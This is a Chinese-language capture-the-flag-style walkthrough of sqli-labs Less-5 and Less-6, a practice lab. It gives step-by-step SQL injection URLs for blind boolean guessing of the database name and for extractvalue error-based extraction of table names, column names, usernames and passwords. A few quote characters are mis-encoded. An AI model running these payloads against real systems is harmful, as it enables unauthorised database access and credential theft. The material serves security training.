sqli-labs-master 盲注+第五关+第六关

sqli-labs-master 盲注+第五关+第六关

实验5

1. 判断注入点
http://localhost/sql/Less-5/?id=1
//看到这个信息,我们知道需要盲注
2. 判断ID类型
http://localhost/sql/Less-5/?id=1%27%20and%20%271%27%20=%201%20%23
3. 查看版本信息
http://localhost/sql/Less-5/?id=1‘  and left(version(),1)=5 %23
4,判断数据库长度
http://localhost/sql/Less-5/?id=1‘ and length(database())= 8 %23
5,猜测数据库名称(从第一位开始猜)
http://localhost/sql/Less-5/?id=1‘ and left(database(),1) =‘s‘ %23
//所以第一位是s
http://localhost/sql/Less-5/?id=1‘ and left(database(),2) =‘se‘ %23
//所以第一位是e
//以此类推,直到推出第8位:最后数据库为security
6,猜测数据库(security)中的表:
http://localhost/sql/Less-5?id=1‘ and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x23))--+
7,猜列名
http://localhost/sql/Less-5?id=1‘ and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users‘ limit 1,1),0x23))--+
8. 爆库
//用户名
http://localhost/sql/Less-5?id=1‘ and extractvalue(1,concat(0x23,(select username from users limit 0,1),0x23))--+
//密码
http://localhost/sql/Less-5?id=1‘ and extractvalue(1,concat(0x23,(select password from users limit 1,1),0x23))--+

实验6

1. 判断注入点
http://localhost/sql/Less-6/?id=1’
//看到这个信息,我们知道需要盲注
2. 判断ID类型
http://localhost/sql/Less-6/?id=1"%27%20and%20%271%27%20=%201%20%23
//实验6与实验5差别就是id多了个单引号
//实验步骤内容与实验5类似故不演示